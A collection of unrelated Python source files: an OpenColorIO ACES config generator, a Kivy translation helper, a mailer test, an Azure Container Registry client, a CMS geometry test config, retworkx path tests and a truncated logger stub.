genus = (beautify_name(genus, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
if genus is not None else genus)
return (f'Output - {family} ({genus}) - ACES {version}'
if genus is not None else f'Output - {family} - ACES {version}')
def beautify_display_name(name):
"""
Beautifies given *OpenColorIO* display name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* display name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* display name.
Examples
--------
>>> beautify_display_name('DISPLAY - CIE-XYZ-D65_to_sRGB')
'Display - sRGB'
>>> beautify_display_name('rec709')
'Display - Rec. 709'
"""
basename = name.split(ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR)[-1]
name = beautify_name(basename, DISPLAY_NAME_SUBSTITUTION_PATTERNS)
return f'Display - {name}'
def ctl_transform_to_colorspace_name(ctl_transform):
"""
Generates the *OpenColorIO* colorspace name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace name
for.
Returns
-------
unicode
*OpenColorIO* colorspace name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_colorspace_name(name)
def ctl_transform_to_look_name(ctl_transform):
"""
Generates the *OpenColorIO* look name for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look name for.
Returns
-------
unicode
*OpenColorIO* look name.
"""
if ctl_transform.source in (ACES_CONFIG_REFERENCE_COLORSPACE,
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE):
name = ctl_transform.target
else:
name = ctl_transform.source
return beautify_look_name(name)
def ctl_transform_to_transform_family(ctl_transform, analytical=True):
"""
Generates the *OpenColorIO* transform family for given *ACES* *CTL*
transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* transform family
for.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Returns
-------
unicode
*OpenColorIO* transform family.
"""
if analytical:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
family = 'CSC'
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
else:
if (ctl_transform.family == 'csc'
and ctl_transform.namespace == 'Academy'):
if re.match('ACES|ADX', ctl_transform.name):
family = 'ACES'
else:
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'input_transform':
family = (f'Input{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}'
f'{ctl_transform.genus}')
elif ctl_transform.family == 'output_transform':
family = 'Output'
elif ctl_transform.family == 'lmt':
family = 'LMT'
return beautify_transform_family(family)
@required('OpenColorIO')
def ctl_transform_to_description(
ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
factory=colorspace_factory,
**kwargs):
"""
Generates the *OpenColorIO* colorspace or look description for given
*ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
factory : callable, optional
Factory used to adjust the code paths because of slight difference
of signature between the *OpenColorIO* colorspace and look.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
unicode
*OpenColorIO* colorspace or look description.
"""
import PyOpenColorIO as ocio
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
forward, inverse = ([
'to_reference',
'from_reference',
] if factory is colorspace_factory else [
'forward_transform',
'inverse_transform',
])
transforms = [
transform for transform in (kwargs.get(forward),
kwargs.get(inverse))
if transform is not None
]
transform = next(iter(transforms), None)
if isinstance(transform, ocio.BuiltinTransform):
description.append(transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
if len(description) > 0:
description.append('')
aces_transform_id = (
ctl_transform.aces_transform_id.aces_transform_id)
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.append(f'ACEStransformID: {aces_transform_id}')
else:
description.append('CTL Transform')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'{ctl_transform.description}\n')
description.append(f'ACEStransformID: {aces_transform_id}')
description = '\n'.join(description)
return description
def ctl_transform_to_colorspace(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* colorspace for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* colorspace for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* colorspace.
"""
name = ctl_transform_to_colorspace_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
colorspace_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'family':
family,
'description':
description,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
def ctl_transform_to_look(ctl_transform,
describe=ColorspaceDescriptionStyle.LONG_UNION,
analytical=True,
**kwargs):
"""
Generates the *OpenColorIO* look for given *ACES* *CTL* transform.
Parameters
----------
ctl_transform : CTLTransform
*ACES* *CTL* transform to generate the *OpenColorIO* look for.
describe : bool, optional
Whether to use the full *ACES* *CTL* transform description or just the
first line.
analytical : bool, optional
Whether to generate the *OpenColorIO* transform family that
analytically matches the given *ACES* *CTL* transform, i.e. true to
the *aces-dev* reference but not necessarily user friendly.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.look_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* look.
"""
name = ctl_transform_to_look_name(ctl_transform)
family = ctl_transform_to_transform_family(ctl_transform, analytical)
description = ctl_transform_to_description(ctl_transform, describe,
look_factory, **kwargs)
settings = {
'name': (f'{beautify_colorspace_name(family)}'
f'{ACES_CONFIG_COLORSPACE_NAME_SEPARATOR}'
f'{name}'),
'description':
description,
}
settings.update(kwargs)
look = look_factory(**settings)
return look
@required('OpenColorIO')
def create_builtin_transform(style):
"""
Creates an *OpenColorIO* builtin transform for given style.
If the style does not exist, a placeholder transform is used in place
of the builtin transform.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
Returns
-------
BuiltinTransform
*OpenColorIO* builtin transform for given style.
"""
import PyOpenColorIO as ocio
builtin_transform = ocio.BuiltinTransform()
try:
builtin_transform.setStyle(style)
except ocio.Exception:
logging.warning(f'{style} style is not defined, '
f'using a placeholder "FileTransform" instead!')
builtin_transform = ocio.FileTransform()
builtin_transform.setSrc(style)
return builtin_transform
@required('OpenColorIO')
def style_to_view_transform(style,
ctl_transforms,
describe=ColorspaceDescriptionStyle.LONG_UNION):
"""
Creates an *OpenColorIO* view transform for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
ctl_transforms : array_like
Array of :class:`opencolorio_config_aces.config.reference.CTLTransform`
class instances corresponding to the given style.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Returns
-------
ViewTransform
*OpenColorIO* view transform for given style.
"""
import PyOpenColorIO as ocio
name = beautify_view_transform_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
if describe in (ColorspaceDescriptionStyle.ACES,
ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
aces_transform_ids, aces_descriptions = zip(
*[(ctl_transform.aces_transform_id.aces_transform_id,
ctl_transform.description)
for ctl_transform in ctl_transforms])
if len(description) > 0:
description.append('')
if describe in (ColorspaceDescriptionStyle.ACES
| ColorspaceDescriptionStyle.SHORT,
ColorspaceDescriptionStyle.SHORT_UNION):
description.extend([
f'ACEStransformID: {aces_transform_id}'
for aces_transform_id in aces_transform_ids
])
else:
description.append(
f'CTL Transform'
f'{"s" if len(aces_transform_ids) >= 2 else ""}')
description.append(f'{"=" * len(description[-1])}\n')
description.append(f'\n{"-" * 80}\n\n'.join([
(f'{aces_descriptions[i]}\n\n'
f'ACEStransformID: {aces_transform_id}\n')
for i, aces_transform_id in enumerate(aces_transform_ids)
]))
description = '\n'.join(description)
view_transform = view_transform_factory(
name, from_reference=builtin_transform, description=description)
return view_transform
@required('OpenColorIO')
def style_to_display_colorspace(
style, describe=ColorspaceDescriptionStyle.OPENCOLORIO, **kwargs):
"""
Creates an *OpenColorIO* display colorspace for given style.
Parameters
----------
style : unicode
*OpenColorIO* builtin transform style
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
Other Parameters
----------------
\\**kwargs : dict, optional
Keywords arguments for the
:func:`opencolorio_config_aces.colorspace_factory` definition.
Returns
-------
ColorSpace
*OpenColorIO* display colorspace for given style.
"""
import PyOpenColorIO as ocio
kwargs.setdefault('family', ACES_CONFIG_DISPLAY_FAMILY)
name = beautify_display_name(style)
builtin_transform = ocio.BuiltinTransform(style)
description = None
if describe != ColorspaceDescriptionStyle.NONE:
description = []
if describe in (ColorspaceDescriptionStyle.OPENCOLORIO,
ColorspaceDescriptionStyle.SHORT_UNION,
ColorspaceDescriptionStyle.LONG_UNION):
description.append(builtin_transform.getDescription())
description = '\n'.join(description)
settings = {
'name': name,
'family': ACES_CONFIG_DISPLAY_FAMILY,
'description': description,
'from_reference': builtin_transform,
'reference_space': ocio.REFERENCE_SPACE_DISPLAY,
}
settings.update(kwargs)
colorspace = colorspace_factory(**settings)
return colorspace
@required('OpenColorIO')
def generate_config_aces(
config_name=None,
validate=True,
describe=ColorspaceDescriptionStyle.SHORT_UNION,
config_mapping_file_path=ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH,
analytical=True,
additional_data=False):
"""
Generates the *aces-dev* reference implementation *OpenColorIO* Config
using the *Mapping* method.
The Config generation is constrained by a *CSV* file exported from the
*Reference Config - Mapping* sheet from a
`Google Sheets file <https://docs.google.com/spreadsheets/d/\
1SXPt-USy3HlV2G2qAvh9zit6ZCINDOlfKT07yXJdWLg>`__. The *Google Sheets* file
was originally authored using the output of the *aces-dev* conversion graph
to support the discussions of the *OpenColorIO* *Working Group* on the
design of the *aces-dev* reference implementation *OpenColorIO* Config.
The resulting mapping is the outcome of those discussions and leverages the
new *OpenColorIO 2* display architecture while factoring many transforms.
Parameters
----------
config_name : unicode, optional
*OpenColorIO* config file name, if given the config will be written to
disk.
validate : bool, optional
Whether to validate the config.
describe : int, optional
Any value from the
:class:`opencolorio_config_aces.ColorspaceDescriptionStyle` enum.
config_mapping_file_path : unicode, optional
Path to the *CSV* mapping file used by the *Mapping* method.
analytical : bool, optional
Whether to generate *OpenColorIO* transform families that analytically
match the given *ACES* *CTL* transform, i.e. true to the *aces-dev*
reference but not necessarily user friendly.
additional_data : bool, optional
Whether to return additional data.
Returns
-------
Config or tuple
*OpenColorIO* config or tuple of *OpenColorIO* config,
:class:`opencolorio_config_aces.ConfigData` class instance and dict of
*OpenColorIO* colorspaces and
:class:`opencolorio_config_aces.config.reference.CTLTransform` class
instances.
"""
import PyOpenColorIO as ocio
ctl_transforms = unclassify_ctl_transforms(
classify_aces_ctl_transforms(discover_aces_ctl_transforms()))
builtin_transforms = [
builtin for builtin in ocio.BuiltinTransformRegistry()
]
config_mapping = defaultdict(list)
with open(config_mapping_file_path) as csv_file:
dict_reader = csv.DictReader(
csv_file,
delimiter=',',
fieldnames=[
'ordering',
'aces_transform_id',
'builtin_transform_style',
'linked_display_colorspace_style',
'interface',
'encoding',
'categories',
])
# Skipping the first header line.
next(dict_reader)
for transform_data in dict_reader:
# Checking whether the "BuiltinTransform" style exists.
style = transform_data['builtin_transform_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Checking whether the linked "DisplayColorspace"
# "BuiltinTransform" style exists.
style = transform_data['linked_display_colorspace_style']
if style:
assert (style in builtin_transforms), (
f'"{style}" "BuiltinTransform" style does not '
f'exist!')
# Finding the "CTLTransform" class instance that matches given
# "ACEStransformID", if it does not exist, there is a critical
# mismatch in the mapping with *aces-dev*.
aces_transform_id = transform_data['aces_transform_id']
filtered_ctl_transforms = [
ctl_transform for ctl_transform in ctl_transforms
if ctl_transform.aces_transform_id.aces_transform_id ==
aces_transform_id
]
ctl_transform = next(iter(filtered_ctl_transforms), None)
assert ctl_transform is not None, (
f'"aces-dev" has no transform with "{aces_transform_id}" '
f'ACEStransformID, please cross-check the '
f'"{config_mapping_file_path}" config mapping file and '
f'the "aces-dev" "CTL" transforms!')
transform_data['ctl_transform'] = ctl_transform
config_mapping[transform_data['builtin_transform_style']].append(
transform_data)
colorspaces = []
looks = []
displays, display_names = [], []
view_transforms, view_transform_names = [], []
shared_views = []
aces_family_prefix = 'CSC' if analytical else 'ACES'
scene_reference_colorspace = colorspace_factory(
f'{aces_family_prefix} - {ACES_CONFIG_REFERENCE_COLORSPACE}',
'ACES',
description=(
'The "Academy Color Encoding System" reference colorspace.'),
encoding='scene-linear')
display_reference_colorspace = colorspace_factory(
'CIE-XYZ-D65',
description='The "CIE XYZ (D65)" display connection colorspace.',
reference_space=ocio.REFERENCE_SPACE_DISPLAY)
raw_colorspace = colorspace_factory(
'Utility - Raw',
'Utility',
description='The utility "Raw" colorspace.',
is_data=True)
colorspaces += [
scene_reference_colorspace,
display_reference_colorspace,
raw_colorspace,
]
for style, transforms_data in config_mapping.items():
if transforms_data[0]['interface'] == 'ViewTransform':
view_transform = style_to_view_transform(style, [
transform_data['ctl_transform']
for transform_data in transforms_data
], describe)
view_transforms.append(view_transform)
view_transform_name = view_transform.getName()
view_transform_names.append(view_transform_name)
for transform_data in transforms_data:
display_style = transform_data[
'linked_display_colorspace_style']
display = style_to_display_colorspace(
display_style,
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
display_name = display.getName()
if display_name not in display_names:
displays.append(display)
display_names.append(display_name)
shared_views.append({
'display': display_name,
'view': view_transform_name,
'view_transform': view_transform_name,
})
else:
for transform_data in transforms_data:
ctl_transform = transform_data['ctl_transform']
if transform_data['interface'] == 'Look':
look = ctl_transform_to_look(
ctl_transform,
describe,
analytical=analytical,
forward_transform=create_builtin_transform(style),
process_space=scene_reference_colorspace.getName(),
)
looks.append(look)
else:
colorspace = ctl_transform_to_colorspace(
ctl_transform,
describe,
analytical=analytical,
to_reference=create_builtin_transform(style),
encoding=transform_data.get('encoding'),
categories=transform_data.get('categories'))
colorspaces.append(colorspace)
untonemapped_view_transform = view_transform_factory(
'Un-tone-mapped',
from_reference=ocio.BuiltinTransform(
'UTILITY - ACES-AP0_to_CIE-XYZ-D65_BFD'),
)
untonemapped_view_transform_name = untonemapped_view_transform.getName()
for display in display_names:
shared_views.append({
'display': display,
'view': untonemapped_view_transform_name,
'view_transform': untonemapped_view_transform_name,
})
data = ConfigData(
description=(
f'The "Academy Color Encoding System" (ACES) "Reference Config".'
f'\n\n'
f'This "OpenColorIO" config is a strict and quasi-analytical '
f'implementation of "aces-dev" and is designed as a reference for '
f'software developers. It is not a replacement for the previous '
f'"ACES" configs nor the "ACES Studio Config".'
f'\n\n'
f'Generated with "OpenColorIO-Config-ACES" {git_describe()} '
f'on the {datetime.now().strftime("%Y/%m/%d at %H:%M")}.'),
roles={
ocio.ROLE_COLOR_TIMING: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_COMPOSITING_LOG: f'{aces_family_prefix} - ACEScct',
ocio.ROLE_DATA: 'Utility - Raw',
ocio.ROLE_DEFAULT: scene_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_DISPLAY:
display_reference_colorspace.getName(),
ocio.ROLE_INTERCHANGE_SCENE: scene_reference_colorspace.getName(),
ocio.ROLE_REFERENCE: scene_reference_colorspace.getName(),
ocio.ROLE_RENDERING: f'{aces_family_prefix} - ACEScg',
ocio.ROLE_SCENE_LINEAR: f'{aces_family_prefix} - ACEScg',
},
colorspaces=colorspaces + displays,
looks=looks,
view_transforms=view_transforms + [untonemapped_view_transform],
shared_views=shared_views,
views=shared_views + [{
'display': display,
'view': 'Raw',
'colorspace': 'Utility - Raw'
} for display in display_names],
active_displays=display_names,
active_views=view_transform_names + ['Raw'],
file_rules=[{
'name': 'Default',
'colorspace': scene_reference_colorspace.getName()
}],
inactive_colorspaces=['CIE-XYZ-D65'],
default_view_transform=untonemapped_view_transform.getName(),
profile_version=2)
config = generate_config(data, config_name, validate)
if additional_data:
return config, data
else:
return config
if __name__ == '__main__':
import os
import opencolorio_config_aces
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
build_directory = os.path.join(opencolorio_config_aces.__path__[0], '..',
'build')
if not os.path.exists(build_directory):
os.makedirs(build_directory)
config, data = generate_config_aces(
config_name=os.path.join(build_directory,
'config-aces-reference.ocio'),
analytical=False,
additional_data=True)
|
from kivy.lang import Observable
import gettext
from constants import LOCALE_DIR
class Lang(Observable):
observers = []
lang = None
def __init__(self, defaultlang, transalte=None):
super(Lang, self).__init__()
self.ugettext = None
self.lang = defaultlang
self._translate = transalte if transalte is not None else gettext.gettext
self.switch_lang(self.lang)
def __call__(self, text):
return self._translate(text)
def fbind(self, name, func, *largs, **kwargs):
if name == "_":
self.observers.append((func, largs, kwargs))
else:
return super(Lang, self).fbind(name, func, *largs, **kwargs)
def funbind(self, name, func, *largs, **kwargs):
if name == "_":
key = (func, largs, kwargs)
if key in self.observers:
self.observers.remove(key)
else:
return super(Lang, self).funbind(name, func, *largs, **kwargs)
def switch_lang(self, lang):
# get the right locales directory, and instanciate a gettext
locales = gettext.translation('Deep3DPhoto', LOCALE_DIR, languages=[lang])
self.ugettext = locales.gettext
# update all the kv rules attached to this text
for func, largs, kwargs in self.observers:
func(largs, None, None)
|
import inspect
import os
import sys
import unittest
from processflow.lib.mailer import Mailer
from processflow.lib.util import print_line
class TestMailer(unittest.TestCase):
def test_send_mail_valid(self):
print '\n'
print_line(
'---- Starting Test: {} ----'.format(inspect.stack()[0][3]), status='ok')
m = Mailer(
src='baldwin32@llnl.gov',
dst='baldwin32@llnl.gov')
ret = m.send(
status='THIS IS A TEST',
msg='THIS IS ONLY A TEST')
self.assertTrue(ret)
def test_send_mail_invalid(self):
print '\n'
print_line(
'---- Starting Test: {} ----'.format(inspect.stack()[0][3]), status='ok')
m = Mailer(
src='xxyyzz',
dst='xxyyzz')
ret = m.send(
status='THIS IS A TEST',
msg='THIS IS ONLY A TEST')
self.assertFalse(ret)
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import ContainerRegistryManagementClientConfiguration
from .operations import ConnectedRegistriesOperations
from .operations import ExportPipelinesOperations
from .operations import RegistriesOperations
from .operations import ImportPipelinesOperations
from .operations import Operations
from .operations import PipelineRunsOperations
from .operations import PrivateEndpointConnectionsOperations
from .operations import ReplicationsOperations
from .operations import ScopeMapsOperations
from .operations import TokensOperations
from .operations import WebhooksOperations
from .. import models
class ContainerRegistryManagementClient(object):
"""ContainerRegistryManagementClient.
:ivar connected_registries: ConnectedRegistriesOperations operations
:vartype connected_registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ConnectedRegistriesOperations
:ivar export_pipelines: ExportPipelinesOperations operations
:vartype export_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ExportPipelinesOperations
:ivar registries: RegistriesOperations operations
:vartype registries: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.RegistriesOperations
:ivar import_pipelines: ImportPipelinesOperations operations
:vartype import_pipelines: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ImportPipelinesOperations
:ivar operations: Operations operations
:vartype operations: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.Operations
:ivar pipeline_runs: PipelineRunsOperations operations
:vartype pipeline_runs: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PipelineRunsOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.PrivateEndpointConnectionsOperations
:ivar replications: ReplicationsOperations operations
:vartype replications: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ReplicationsOperations
:ivar scope_maps: ScopeMapsOperations operations
:vartype scope_maps: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.ScopeMapsOperations
:ivar tokens: TokensOperations operations
:vartype tokens: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.TokensOperations
:ivar webhooks: WebhooksOperations operations
:vartype webhooks: azure.mgmt.containerregistry.v2020_11_01_preview.aio.operations.WebhooksOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The Microsoft Azure subscription ID.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = ContainerRegistryManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.connected_registries = ConnectedRegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.export_pipelines = ExportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.registries = RegistriesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.import_pipelines = ImportPipelinesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.pipeline_runs = PipelineRunsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.replications = ReplicationsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.scope_maps = ScopeMapsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.tokens = TokensOperations(
self._client, self._config, self._serialize, self._deserialize)
self.webhooks = WebhooksOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "ContainerRegistryManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("CompareGeometryTest")
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.MessageLogger = cms.Service(
"MessageLogger",
statistics = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('MTDUnitTest',
'DD4hep_TestMTDIdealGeometry',
'DD4hep_TestMTDPath',
'DD4hep_TestMTDNumbering',
'DD4hep_TestMTDPosition'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
DD4hep_TestMTDIdealGeometry = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPath = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDNumbering = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
DD4hep_TestMTDPosition = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
noLineBreaks = cms.untracked.bool(True)
),
mtdCommonDataDD4hep = cms.untracked.PSet(
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True),
DEBUG = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
ERROR = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
threshold = cms.untracked.string('INFO'),
MTDUnitTest = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
),
destinations = cms.untracked.vstring('cout',
'mtdCommonDataDD4hep')
)
process.DDDetectorESProducer = cms.ESSource("DDDetectorESProducer",
confGeomXMLFiles = cms.FileInPath('Geometry/MTDCommonData/data/dd4hep/cms-mtdD50-geometry.xml'),
appendToDataLabel = cms.string('MTD')
)
process.DDSpecParRegistryESProducer = cms.ESProducer("DDSpecParRegistryESProducer",
appendToDataLabel = cms.string('MTD')
)
process.testBTL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('BarrelTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.testETL = cms.EDAnalyzer("DD4hep_TestMTDIdealGeometry",
DDDetector = cms.ESInputTag('','MTD'),
ddTopNodeName = cms.untracked.string('EndcapTimingLayer'),
theLayout = cms.untracked.uint32(4)
)
process.Timing = cms.Service("Timing")
process.p1 = cms.Path(process.testBTL+process.testETL)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
import retworkx
class TestLongestPath(unittest.TestCase):
def test_linear(self):
"""Longest depth for a simple dag.
a
|
b
|\
c d
|\
e |
| |
f g
"""
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
dag.add_child(node_b, "d", {})
node_e = dag.add_child(node_c, "e", {})
node_f = dag.add_child(node_e, "f", {})
dag.add_child(node_c, "g", {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_e, node_f],
retworkx.dag_longest_path(dag),
)
def test_less_linear(self):
dag = retworkx.PyDAG()
node_a = dag.add_node("a")
node_b = dag.add_child(node_a, "b", {})
node_c = dag.add_child(node_b, "c", {})
node_d = dag.add_child(node_c, "d", {})
node_e = dag.add_child(node_d, "e", {})
dag.add_edge(node_a, node_c, {})
dag.add_edge(node_a, node_e, {})
dag.add_edge(node_c, node_e, {})
self.assertEqual(4, retworkx.dag_longest_path_length(dag))
self.assertEqual(
[node_a, node_b, node_c, node_d, node_e],
retworkx.dag_longest_path(dag),
)
def test_degenerate_graph(self):
dag = retworkx.PyDAG()
dag.add_node(0)
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([0], retworkx.dag_longest_path(dag))
def test_empty_graph(self):
dag = retworkx.PyDAG()
self.assertEqual(0, retworkx.dag_longest_path_length(dag))
self.assertEqual([], retworkx.dag_longest_path(dag))
|
import logging
from mmcv.utils import get_logger
def get_root_logger(log_file=None, log_level=logging.INFO):
